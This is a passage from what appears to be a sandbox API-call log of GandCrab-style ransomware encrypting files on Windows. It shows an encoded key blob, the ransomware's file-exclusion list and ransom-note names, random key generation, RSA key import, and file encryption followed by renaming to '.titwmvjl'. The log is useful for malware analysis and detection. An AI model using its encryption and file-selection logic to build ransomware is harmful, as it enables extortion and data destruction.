x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.418] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.419] CloseHandle (hObject=0x230) returned 1 [0096.419] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.419] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.420] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x2e2)) [0096.420] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.420] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.420] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.420] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\NetHood\\d2ca4a09d2ca4deb61a.lock") returned 49 [0096.420] CreateFileW (lpFileName="C:\\Users\\Default\\NetHood\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\nethood\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.421] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.421] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.421] lstrlenW (lpString="C:\\Users\\Default\\NetHood\\") returned 25 [0096.421] lstrcatW (in: lpString1="C:\\Users\\Default\\NetHood\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\NetHood\\*") returned="C:\\Users\\Default\\NetHood\\*" [0096.421] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\NetHood\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.421] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.422] CloseHandle (hObject=0x230) returned 1 [0096.422] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.422] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0096.422] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0096.422] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT") returned="C:\\Users\\Default\\NTUSER.DAT" [0096.422] lstrlenW (lpString=".titwmvjl") returned 9 [0096.422] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT") returned 27 [0096.422] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.422] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT.titwmvjl") returned 36 [0096.422] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT") returned 27 [0096.422] lstrlenW (lpString=".DAT") returned 4 [0096.422] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.422] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".DAT ") returned 5 [0096.422] lstrcmpiW (lpString1=".DAT", lpString2=".titwmvjl") returned -1 [0096.423] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.423] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT") returned 27 [0096.423] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT") returned 27 [0096.423] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="desktop.ini") returned 1 [0096.423] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="autorun.inf") returned 1 [0096.423] lstrcmpiW (lpString1="NTUSER.DAT", lpString2="ntuser.dat") returned 0 [0096.423] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.423] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.423] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1 [0096.423] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1 [0096.423] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT.LOG1" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned="C:\\Users\\Default\\NTUSER.DAT.LOG1" [0096.423] lstrlenW (lpString=".titwmvjl") returned 9 [0096.423] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32 [0096.423] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.424] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT.LOG1.titwmvjl") returned 41 [0096.424] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32 [0096.424] lstrlenW (lpString=".LOG1") returned 5 [0096.424] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.424] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".LOG1 ") returned 6 [0096.424] lstrcmpiW (lpString1=".LOG1", lpString2=".titwmvjl") returned -1 [0096.424] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.424] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32 [0096.424] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="desktop.ini") returned 1 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="autorun.inf") returned 1 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ntuser.dat") returned 1 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="iconcache.db") returned 1 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="bootsect.bak") returned 1 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="boot.ini") returned 1 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ntuser.dat.log") returned 1 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="thumbs.db") returned -1 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0096.424] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0096.425] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="KRAB-DECRYPT.html") returned 1 [0096.425] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="CRAB-DECRYPT.html") returned 1 [0096.425] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="KRAB-DECRYPT.txt") returned 1 [0096.425] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="CRAB-DECRYPT.txt") returned 1 [0096.425] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="ntldr") returned 1 [0096.425] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="NTDETECT.COM") returned 1 [0096.425] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="Bootfont.bin") returned 1 [0096.425] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 32 [0096.425] lstrlenW (lpString=".LOG1") returned 5 [0096.425] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.425] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".LOG1 ") returned 6 [0096.425] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.425] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.425] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x230 [0096.426] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.426] ReadFile (in: hFile=0x230, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f704*=0x21c, lpOverlapped=0x0) returned 1 [0096.433] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.433] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.434] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.434] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.434] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.434] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f6c0 | out: pbBuffer=0x259f6c0) returned 1 [0096.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.434] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.434] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.435] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0096.435] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0096.435] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0096.435] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0096.435] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f6e0 | out: pbBuffer=0x259f6e0) returned 1 [0096.435] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.435] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.435] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.436] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.436] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x503738) returned 1 [0096.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.436] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.436] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.437] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.437] GetLastError () returned 0x0 [0096.437] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.437] CryptDestroyKey (hKey=0x503738) returned 1 [0096.437] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.437] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.437] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.437] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0096.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.438] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x5036f8) returned 1 [0096.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.438] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0096.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.438] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f658*=0x100) returned 1 [0096.438] GetLastError () returned 0x0 [0096.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.438] CryptDestroyKey (hKey=0x5036f8) returned 1 [0096.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0096.439] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0096.439] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0096.439] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0096.439] ReadFile (in: hFile=0x230, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f704*=0x6000, lpOverlapped=0x0) returned 1 [0096.480] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xffffa000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.480] WriteFile (in: hFile=0x230, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6000, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f6e8*=0x6000, lpOverlapped=0x0) returned 1 [0096.491] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.491] WriteFile (in: hFile=0x230, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f6e8*=0x21c, lpOverlapped=0x0) returned 1 [0096.493] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.498] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.499] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.499] CloseHandle (hObject=0x230) returned 1 [0096.502] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT.LOG1.titwmvjl" (normalized: "c:\\users\\default\\ntuser.dat.log1.titwmvjl"), dwFlags=0x1) returned 1 [0096.503] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.503] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.503] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2=".") returned 1 [0096.503] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="..") returned 1 [0096.503] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="NTUSER.DAT.LOG2" | out: lpString1="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned="C:\\Users\\Default\\NTUSER.DAT.LOG2" [0096.503] lstrlenW (lpString=".titwmvjl") returned 9 [0096.503] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 32 [0096.503] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.503] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT.LOG2.titwmvjl") returned 41 [0096.504] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 32 [0096.504] lstrlenW (lpString=".LOG2") returned 5 [0096.504] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.504] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".LOG2 ") returned 6 [0096.504] lstrcmpiW (lpString1=".LOG2", lpString2=".titwmvjl") returned -1 [0096.504] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.504] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 32 [0096.504] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 32 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="desktop.ini") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="autorun.inf") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntuser.dat") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="iconcache.db") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="bootsect.bak") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="boot.ini") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="ntuser.dat.log") returned 1 [0096.504] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="thumbs.db") returned -1 [0096.504] lstrcmpiW 